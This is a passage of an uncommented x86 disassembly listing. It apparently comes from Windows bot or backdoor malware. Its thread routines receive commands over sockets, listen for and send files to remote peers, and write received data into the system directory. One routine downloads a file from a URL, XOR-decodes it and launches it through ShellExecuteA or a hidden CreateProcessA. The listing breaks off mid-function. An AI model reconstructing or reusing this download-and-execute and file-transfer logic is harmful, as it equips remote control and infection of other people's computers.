loc_40CEC5: ; CODE XREF: sub_40CE49+1B�j
; sub_40CE49+58�j
mov eax, esi
jmp short loc_40CECB
; ---------------------------------------------------------------------------
loc_40CEC9: ; CODE XREF: sub_40CE49+73�j
mov eax, edi
loc_40CECB: ; CODE XREF: sub_40CE49+7E�j
pop edi
pop esi
leave
retn
sub_40CE49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40CECF(LPVOID)
sub_40CECF proc near ; DATA XREF: sub_40FCA3+A2C�o
Buffer = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
name = byte ptr -1ACh
var_94 = dword ptr -94h
hostshort = word ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_417F30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push dword ptr [ebp+hostshort] ; hostshort
xor esi, esi
inc esi
mov [eax+1B0h], esi
lea eax, [ebp+name]
push eax ; name
call sub_40CE49
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_40CF62
lea eax, [ebp+Buffer]
push 430074h
push eax
call sub_41795B
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40CF45
push edi ; int
lea eax, [ebp+Buffer]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_94]
push eax ; int
push ebx ; s
call sub_40E1D6
add esp, 14h
loc_40CF45: ; CODE XREF: sub_40CECF+59�j
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
push [ebp+var_10]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40CF62: ; CODE XREF: sub_40CECF+3F�j
push 440F9Ch
push ebx
call sub_40C069
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40CFCD
lea eax, [ebp+Buffer]
push 430034h
push eax
call sub_41795B
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40CFA9
push edi ; int
lea eax, [ebp+Buffer]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_94]
push eax ; int
push ebx ; s
call sub_40E1D6
add esp, 14h
loc_40CFA9: ; CODE XREF: sub_40CECF+BD�j
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
pop ecx
push ebx ; s
call closesocket_0
push [ebp+var_10]
call sub_417735
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40CFCD: ; CODE XREF: sub_40CECF+A3�j
push 64h ; dwMilliseconds
call Sleep ; Sleep
xor edi, edi
mov esi, 1000h
loc_40CFDC: ; CODE XREF: sub_40CECF+168�j
push esi
lea eax, [ebp+Buffer]
push edi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+Buffer]
push edi ; flags
push esi ; len
push eax ; buf
push ebx ; s
call recv_0
test eax, eax
jle short loc_40D039
lea eax, [ebp+Buffer]
push 42AFB4h
push eax
call sub_417FF0
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call sub_40BE55
add esp, 0Ch
test eax, eax
jz short loc_40D039
push 64h ; dwMilliseconds
call Sleep ; Sleep
push 7
call sub_417661
test eax, eax
pop ecx
jnz short loc_40CFDC
loc_40D039: ; CODE XREF: sub_40CECF+130�j
; sub_40CECF+154�j
lea eax, [ebp+Buffer]
push 42FFF0h
push eax
call sub_41795B
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_40D06C
push edi ; int
lea eax, [ebp+Buffer]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+var_94]
push eax ; int
push ebx ; s
call sub_40E1D6
add esp, 14h
loc_40D06C: ; CODE XREF: sub_40CECF+180�j
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
pop ecx
push ebx ; s
call closesocket_0
push [ebp+var_10]
call sub_417735
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
sub_40CECF endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40D090(LPVOID)
sub_40D090 proc near ; DATA XREF: sub_40FCA3+4D37�o
buf = byte ptr -0A04h
var_604 = byte ptr -604h
readfds = fd_set ptr -500h
var_3FC = dword ptr -3FCh
var_1FC = dword ptr -1FCh
s = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = dword ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
addr = sockaddr ptr -48h
timeout = timeval ptr -38h
name = sockaddr ptr -30h
var_20 = dword ptr -20h
namelen = dword ptr -1Ch
var_18 = dword ptr -18h
addrlen = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
len = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
xor ebx, ebx
xor esi, esi
inc ebx
push esi ; protocol
push ebx ; type
push 2 ; af
mov [eax+1B0h], ebx
mov [ebp+var_10], esi
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call socket_0
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_40D0DE
push 4301F8h
jmp loc_40D297
; ---------------------------------------------------------------------------
loc_40D0DE: ; CODE XREF: sub_40D090+42�j
push 10h
lea eax, [ebp+name]
push esi
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push esi ; hostshort
call htons_2
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push edi ; s
mov dword ptr [ebp+name.sa_data+2], esi
call bind_0
test eax, eax
jz short loc_40D11C
push 4301C4h
jmp loc_40D297
; ---------------------------------------------------------------------------
loc_40D11C: ; CODE XREF: sub_40D090+80�j
lea eax, [ebp+namelen]
mov [ebp+namelen], 10h
push eax ; namelen
lea eax, [ebp+name]
push eax ; name
push edi ; s
call getsockname ; getsockname
push dword ptr [ebp+name.sa_data] ; hostshort
call htons_1
mov [ebp+len], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_4180D0
pop ecx
loc_40D14E: ; CODE XREF: sub_40D090+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_40D161
push 5Fh
pop eax
jmp short loc_40D164
; ---------------------------------------------------------------------------
loc_40D161: ; CODE XREF: sub_40D090+CA�j
movsx eax, al
loc_40D164: ; CODE XREF: sub_40D090+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_4180D0
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_40D14E
push ebx ; backlog
push edi ; s
call listen_0
test eax, eax
jz short loc_40D197
push 430074h
jmp loc_40D297
; ---------------------------------------------------------------------------
loc_40D197: ; CODE XREF: sub_40D090+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call dword ptr byte_424084
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40D1C1
push 430194h
jmp loc_40D297
; ---------------------------------------------------------------------------
loc_40D1C1: ; CODE XREF: sub_40D090+125�j
push esi
push eax
call dword ptr byte_42409C
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+len]
push eax
push [ebp+var_1FC] ; s
call sub_40B972
pop ecx
push eax ; cp
call inet_addr_0
push eax ; hostlong
call htonl_0
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push 43017Ch
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+var_3FC]
push esi ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; int
push [ebp+var_1FC] ; s
call sub_40E1D6
add esp, 2Ch
lea eax, [ebp+timeout]
mov [ebp+timeout.tv_sec], 3Ch
mov [ebp+timeout.tv_usec], esi
push eax ; timeout
push esi ; exceptfds
lea eax, [ebp+readfds]
push esi ; writefds
push eax ; readfds
push esi ; nfds
mov [ebp+readfds.fd_array], edi
mov [ebp+readfds.fd_count], ebx
call select_0
test eax, eax
jg short loc_40D271
push esi ; int
lea eax, [ebp+var_DC]
push [ebp+var_54] ; int
push 430154h ; int
push eax ; int
push [ebp+var_1FC] ; s
call sub_40E1D6
jmp loc_40D395
; ---------------------------------------------------------------------------
loc_40D271: ; CODE XREF: sub_40D090+1BF�j
lea eax, [ebp+addrlen]
mov [ebp+addrlen], 10h
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push edi ; s
call accept_0
cmp eax, 0FFFFFFFFh
mov [ebp+s], eax
jnz short loc_40D2AA
push 430120h
loc_40D297: ; CODE XREF: sub_40D090+49�j
; sub_40D090+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_41795B
pop ecx
pop ecx
jmp loc_40D398
; ---------------------------------------------------------------------------
loc_40D2AA: ; CODE XREF: sub_40D090+200�j
push edi ; s
call closesocket_0
cmp [ebp+arg_0], esi
jz loc_40D35C
mov edi, 400h
loc_40D2BF: ; CODE XREF: sub_40D090+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+len], edi
cmp eax, edi
jge short loc_40D2CC
mov [ebp+len], eax
loc_40D2CC: ; CODE XREF: sub_40D090+237�j
push edi
lea eax, [ebp+buf]
push esi
push eax
call sub_4179E0
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call dword ptr byte_4240B0+8
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+buf]
push [ebp+len]
push eax
push [ebp+var_8]
call dword ptr byte_424074
push esi ; flags
lea eax, [ebp+buf]
push [ebp+len] ; len
push eax ; buf
push [ebp+s] ; s
call send_0
mov [ebp+len], eax
push esi ; flags
cdq
add [ebp+var_10], eax
lea eax, [ebp+buf]
push edi ; len
push eax ; buf
push [ebp+s] ; s
adc [ebp+var_C], edx
call recv_0
cmp eax, ebx
jl loc_40D3F1
mov eax, [ebp+len]
cmp eax, ebx
jl loc_40D3F1
sub [ebp+arg_0], eax
jnz loc_40D2BF
mov edi, [ebp+var_18]
loc_40D35C: ; CODE XREF: sub_40D090+224�j
push [ebp+var_8]
call dword ptr byte_424074+4
push [ebp+var_C]
push [ebp+var_10]
call sub_40DB83
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1E0]
push eax
push dword ptr [ebp+addr.sa_data+2] ; in
call inet_ntoa_0
push eax
lea eax, [ebp+var_3FC]
push 4300D0h
push eax
call sub_41795B
loc_40D395: ; CODE XREF: sub_40D090+1DC�j
add esp, 14h
loc_40D398: ; CODE XREF: sub_40D090+215�j
cmp [ebp+var_50], esi
jnz short loc_40D3BD
push esi ; int
lea eax, [ebp+var_3FC]
push [ebp+var_54] ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; int
push [ebp+var_1FC] ; s
call sub_40E1D6
add esp, 14h
loc_40D3BD: ; CODE XREF: sub_40D090+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_40CB08
cmp edi, esi
pop ecx
jbe short loc_40D3D5
push edi ; s
call closesocket_0
loc_40D3D5: ; CODE XREF: sub_40D090+33C�j
push [ebp+s] ; s
call closesocket_0
push [ebp+var_58]
call sub_417735
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40D3F1: ; CODE XREF: sub_40D090+2AF�j
; sub_40D090+2BA�j
push esi ; int
mov esi, 4300A8h
push [ebp+var_54] ; int
lea eax, [ebp+var_DC]
push esi ; int
push eax ; int
push [ebp+var_1FC] ; s
call sub_40E1D6
push esi
call sub_40CB08
add esp, 18h
push [ebp+s] ; s
call closesocket_0
push [ebp+var_58]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_40D090 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40D432(LPVOID)
sub_40D432 proc near ; DATA XREF: sub_40FCA3+77F�o
buf = byte ptr -14C4h
var_4C4 = dword ptr -4C4h
Buffer = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
name = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = dword ptr -0A0h
hostshort = word ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
hostlong = dword ptr -8
var_4 = dword ptr -4
s = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_417F30
mov eax, [ebp+s]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
xor esi, esi
xor ebx, ebx
inc esi
push 104h ; uSize
mov [eax+1B0h], esi
lea eax, [ebp+Buffer]
push eax ; lpBuffer
mov [ebp+hostlong], ebx
call GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+Buffer]
push eax
lea eax, [ebp+Buffer]
push 42AFB8h
push eax
call sub_41795B
add esp, 10h
lea eax, [ebp+Buffer]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call dword ptr byte_424084
cmp eax, 0FFFFFFFFh
jnz short loc_40D4BC
push 4302F4h
jmp short loc_40D502
; ---------------------------------------------------------------------------
loc_40D4BC: ; CODE XREF: sub_40D432+81�j
push eax
call dword ptr byte_424074+4
lea eax, [ebp+Buffer]
push 4302F0h
push eax
call sub_41924D
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_40D4E4
push 4302B4h
jmp short loc_40D502
; ---------------------------------------------------------------------------
loc_40D4E4: ; CODE XREF: sub_40D432+A9�j
push dword ptr [ebp+hostshort] ; hostshort
lea eax, [ebp+name]
push eax ; name
call sub_40CE49
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+s], eax
jnz short loc_40D515
push 430284h
loc_40D502: ; CODE XREF: sub_40D432+88�j
; sub_40D432+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_41795B
pop ecx
pop ecx
jmp loc_40D60F
; ---------------------------------------------------------------------------
loc_40D515: ; CODE XREF: sub_40D432+C9�j
mov esi, 1000h
loc_40D51A: ; CODE XREF: sub_40D432+14E�j
push esi
lea eax, [ebp+buf]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+buf]
push ebx ; flags
push esi ; len
push eax ; buf
push [ebp+s] ; s
call recv_0
mov edi, eax
cmp edi, ebx
jz loc_40D5E1
cmp edi, 0FFFFFFFFh
jz short loc_40D582
push [ebp+var_4] ; int
lea eax, [ebp+buf]
push edi ; int
push 1 ; int
push eax ; lpBuffer
call sub_41990C
add [ebp+hostlong], edi
add esp, 10h
push [ebp+hostlong] ; hostlong
call htonl_0
mov [ebp+var_C], eax
push ebx ; flags
lea eax, [ebp+var_C]
push 4 ; len
push eax ; buf
push [ebp+s] ; s
call send_0
jmp short loc_40D51A
; ---------------------------------------------------------------------------
loc_40D582: ; CODE XREF: sub_40D432+118�j
lea eax, [ebp+var_4C4]
push 4300A8h
push eax
call sub_41795B
push ebx ; int
lea eax, [ebp+var_4C4]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+var_A0]
push eax ; int
push [ebp+var_1C0] ; s
call sub_40E1D6
lea eax, [ebp+var_4C4]
push eax
call sub_40CB08
push [ebp+var_4]
call sub_418F0B
add esp, 24h
push [ebp+s] ; s
call closesocket_0
push [ebp+var_1C]
call sub_417735
pop ecx
push 1 ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40D5E1: ; CODE XREF: sub_40D432+10F�j
mov eax, [ebp+hostlong]
cdq
push edx
push eax
call sub_40DB83
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+name]
push eax
lea eax, [ebp+var_4C4]
push 430230h
push eax
call sub_41795B
add esp, 1Ch
loc_40D60F: ; CODE XREF: sub_40D432+DE�j
cmp [ebp+var_14], ebx
jnz short loc_40D634
push ebx ; int
lea eax, [ebp+var_4C4]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+var_A0]
push eax ; int
push [ebp+var_1C0] ; s
call sub_40E1D6
add esp, 14h
loc_40D634: ; CODE XREF: sub_40D432+1E0�j
lea eax, [ebp+var_4C4]
push eax
call sub_40CB08
cmp [ebp+var_4], ebx
pop ecx
jz short loc_40D64F
push [ebp+var_4]
call sub_418F0B
pop ecx
loc_40D64F: ; CODE XREF: sub_40D432+212�j
cmp [ebp+s], ebx
jbe short loc_40D65D
push [ebp+s] ; s
call closesocket_0
loc_40D65D: ; CODE XREF: sub_40D432+220�j
push [ebp+var_1C]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_40D432 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40D66D(LPVOID)
sub_40D66D proc near ; DATA XREF: sub_40FCA3+38F8�o
; sub_40FCA3+4051�o
var_530 = qword ptr -530h
var_524 = qword ptr -524h
Buffer = byte ptr -510h
StartupInfo = _STARTUPINFOA ptr -310h
s = dword ptr -2CCh
var_2C8 = dword ptr -2C8h
var_248 = byte ptr -248h
CommandLine = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
NumberOfBytesWritten= dword ptr -24h
hFile = dword ptr -20h
lpMem = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
ProcessInformation= _PROCESS_INFORMATION ptr -10h
nNumberOfBytesToWrite= dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+nNumberOfBytesToWrite]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+s]
rep movsd
xor edi, edi
xor esi, esi
inc edi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword ptr byte_445DD4
call InternetOpenUrlA ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_40DAE6
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+CommandLine]
push 40000000h
push eax
call dword ptr byte_424084
cmp eax, edi
mov [ebp+hFile], eax
jnb short loc_40D734
lea eax, [ebp+CommandLine]
push eax
lea eax, [ebp+Buffer]
push 430590h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40D717
push esi ; int
lea eax, [ebp+Buffer]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40D717: ; CODE XREF: sub_40D66D+88�j
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
push [ebp+var_48]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
; ---------------------------------------------------------------------------
loc_40D734: ; CODE XREF: sub_40D66D+68�j
xor edi, edi
call GetTickCount ; GetTickCount
mov ebx, 7D000h
mov [ebp+ProcessInformation.dwThreadId], eax
push ebx
call sub_418175
pop ecx
mov [ebp+lpMem], eax
loc_40D74E: ; CODE XREF: sub_40D66D+1A9�j
push 200h
lea eax, [ebp+Buffer]
push esi
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+nNumberOfBytesToWrite]
push eax
lea eax, [ebp+Buffer]
push 200h
push eax
push [ebp+var_18]
call InternetReadFile ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_40D792
push [ebp+nNumberOfBytesToWrite]
lea eax, [ebp+Buffer]
push eax
call sub_40DB4C
pop ecx
pop ecx
loc_40D792: ; CODE XREF: sub_40D66D+112�j
lea eax, [ebp+NumberOfBytesWritten]
push esi ; lpOverlapped
push eax ; lpNumberOfBytesWritten
lea eax, [ebp+Buffer]
push [ebp+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push eax ; lpBuffer
push [ebp+hFile] ; hFile
call WriteFile ; WriteFile
cmp edi, ebx
jnb short loc_40D7D0
mov eax, ebx
sub eax, edi
cmp eax, [ebp+nNumberOfBytesToWrite]
jbe short loc_40D7BA
mov eax, [ebp+nNumberOfBytesToWrite]
loc_40D7BA: ; CODE XREF: sub_40D66D+148�j
push eax
lea eax, [ebp+Buffer]
push eax
mov eax, [ebp+lpMem]
add eax, edi
push eax
call sub_417A40
add esp, 0Ch
loc_40D7D0: ; CODE XREF: sub_40D66D+13F�j
add edi, [ebp+nNumberOfBytesToWrite]
cmp [ebp+var_3C], esi
jz short loc_40D7DD
cmp edi, [ebp+var_3C]
ja short loc_40D81C
loc_40D7DD: ; CODE XREF: sub_40D66D+169�j
mov eax, edi
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
mov eax, [ebp+var_48]
imul eax, 234h
add eax, 44B668h
cmp [ebp+var_44], 1
jz short loc_40D805
push 430548h
jmp short loc_40D80A
; ---------------------------------------------------------------------------
loc_40D805: ; CODE XREF: sub_40D66D+18F�j
push 430504h
loc_40D80A: ; CODE XREF: sub_40D66D+196�j
push eax
call sub_41795B
add esp, 10h
cmp [ebp+nNumberOfBytesToWrite], esi
ja loc_40D74E
loc_40D81C: ; CODE XREF: sub_40D66D+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_40D871
cmp edi, [ebp+var_3C]
jz short loc_40D871
push [ebp+var_3C]
lea eax, [ebp+Buffer]
mov [ebp+var_14], esi
push edi
push 4304C0h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+Buffer]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
add esp, 28h
loc_40D871: ; CODE XREF: sub_40D66D+1B9�j
; sub_40D66D+1BE�j
call GetTickCount ; GetTickCount
sub eax, [ebp+ProcessInformation.dwThreadId]
xor edx, edx
mov ecx, 3E8h
push [ebp+hFile]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call dword ptr byte_424074+4
push [ebp+lpMem] ; lpMem
call sub_418227
cmp [ebp+var_38], esi
pop ecx
jz short loc_40D8FB
lea eax, [ebp+CommandLine]
push eax
call sub_40CDD9
cmp eax, [ebp+var_38]
pop ecx
jz short loc_40D8FB
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+Buffer]
push 430488h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+Buffer]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
add esp, 28h
loc_40D8FB: ; CODE XREF: sub_40D66D+236�j
; sub_40D66D+248�j
cmp [ebp+var_14], esi
jz loc_40DB33
cmp [ebp+var_44], 1
push ecx
lea eax, [ebp+CommandLine]
push ecx
jz loc_40D9F6
mov [ebp+ProcessInformation.dwProcessId], ebx
mov [ebp+ProcessInformation.dwThreadId], esi
fild qword ptr [ebp+ProcessInformation.dwProcessId]
mov [ebp+ProcessInformation.dwProcessId], edi
mov [ebp+ProcessInformation.dwThreadId], esi
fmul qword ptr unk_424688
fstp [esp+524h+var_524]
fild qword ptr [ebp+ProcessInformation.dwProcessId]
push eax
push ecx
push ecx
lea eax, [ebp+Buffer]
fmul qword ptr unk_424688
fstp [esp+530h+var_530]
push 430440h
push eax
call sub_41795B
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40D976
push esi ; int
lea eax, [ebp+Buffer]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40D976: ; CODE XREF: sub_40D66D+2E7�j
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
cmp [ebp+var_40], 1
pop ecx
jnz loc_40DB33
push 5 ; nShowCmd
push esi ; lpDirectory
lea eax, [ebp+CommandLine]
push esi ; lpParameters
push eax ; lpFile
push offset Operation ; lpOperation
push esi ; hwnd
call ShellExecuteA ; ShellExecuteA
cmp [ebp+var_30], esi
jnz loc_40DB33
lea eax, [ebp+CommandLine]
push eax
lea eax, [ebp+Buffer]
push 430408h
push eax
call sub_41795B
push esi ; int
lea eax, [ebp+Buffer]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
add esp, 24h
jmp loc_40DB33
; ---------------------------------------------------------------------------
loc_40D9F6: ; CODE XREF: sub_40D66D+2A3�j
mov [ebp+ProcessInformation.dwProcessId], ebx
mov [ebp+ProcessInformation.dwThreadId], esi
fild qword ptr [ebp+ProcessInformation.dwProcessId]
mov [ebp+ProcessInformation.dwProcessId], edi
mov [ebp+ProcessInformation.dwThreadId], esi
fmul qword ptr unk_424688
fstp [esp+524h+var_524]
fild qword ptr [ebp+ProcessInformation.dwProcessId]
push eax
push ecx
push ecx
lea eax, [ebp+Buffer]
fmul qword ptr unk_424688
fstp [esp+530h+var_530]
push 4303B8h
push eax
call sub_41795B
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40DA56
push esi ; int
lea eax, [ebp+Buffer]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40DA56: ; CODE XREF: sub_40D66D+3C7�j
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
push 10h
lea eax, [ebp+ProcessInformation]
push esi
push eax
call sub_4179E0
push 44h
lea eax, [ebp+StartupInfo]
pop edi
push edi
push esi
push eax
call sub_4179E0
add esp, 1Ch
lea eax, [ebp+ProcessInformation]
mov [ebp+StartupInfo.cb], edi
xor edi, edi
push eax ; lpProcessInformation
lea eax, [ebp+StartupInfo]
push eax ; lpStartupInfo
push esi ; lpCurrentDirectory
push esi ; lpEnvironment
push 28h ; dwCreationFlags
push esi ; bInheritHandles
push esi ; lpThreadAttributes
lea eax, [ebp+CommandLine]
push esi ; lpProcessAttributes
inc edi
push eax ; lpCommandLine
push esi ; lpApplicationName
mov [ebp+StartupInfo.lpTitle], 440F9Ch
mov [ebp+StartupInfo.dwFlags], edi
mov [ebp+StartupInfo.wShowWindow], si
call CreateProcessA ; CreateProcessA
cmp eax, edi
jnz short loc_40DAD8
call WSACleanup_0
call sub_40B584
push esi
call dword ptr byte_424150
loc_40DAD8: ; CODE XREF: sub_40D66D+457�j
lea eax, [ebp+CommandLine]
push eax
push 430370h
jmp short loc_40DAF2
; ---------------------------------------------------------------------------
loc_40DAE6: ; CODE XREF: sub_40D66D+45�j
lea eax, [ebp+var_248]
push eax
push 430334h
loc_40DAF2: ; CODE XREF: sub_40D66D+477�j
lea eax, [ebp+Buffer]
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40DB26
push esi ; int
lea eax, [ebp+Buffer]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40DB26: ; CODE XREF: sub_40D66D+497�j
lea eax, [ebp+Buffer]
push eax
call sub_40CB08
pop ecx
loc_40DB33: ; CODE XREF: sub_40D66D+291�j
; sub_40D66D+31A�j ...
push [ebp+var_18]
call InternetCloseHandle ; InternetCloseHandle
push [ebp+var_48]
call sub_417735
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_40D66D endp
; =============== S U B R O U T I N E =======================================
sub_40DB4C proc near ; CODE XREF: sub_40D66D+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_40DB68
loc_40DB58: ; CODE XREF: sub_40DB4C+1A�j
mov dl, byte ptr unk_4315B8
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_40DB58
locret_40DB68: ; CODE XREF: sub_40DB4C+A�j
retn
sub_40DB4C endp
; =============== S U B R O U T I N E =======================================
sub_40DB69 proc near ; CODE XREF: sub_40FCA3+2B0A�p
; sub_40FCA3+2C77�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_419F3F
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40DB69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB83 proc near ; CODE XREF: sub_406C89+462�p
; sub_406C89+5FE�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, 44A1E0h
push 0
push edi
call sub_4179E0
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_40DBA8: ; CODE XREF: sub_40DB83+5B�j
; sub_40DB83+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_419A20
push 0
push 0Ah
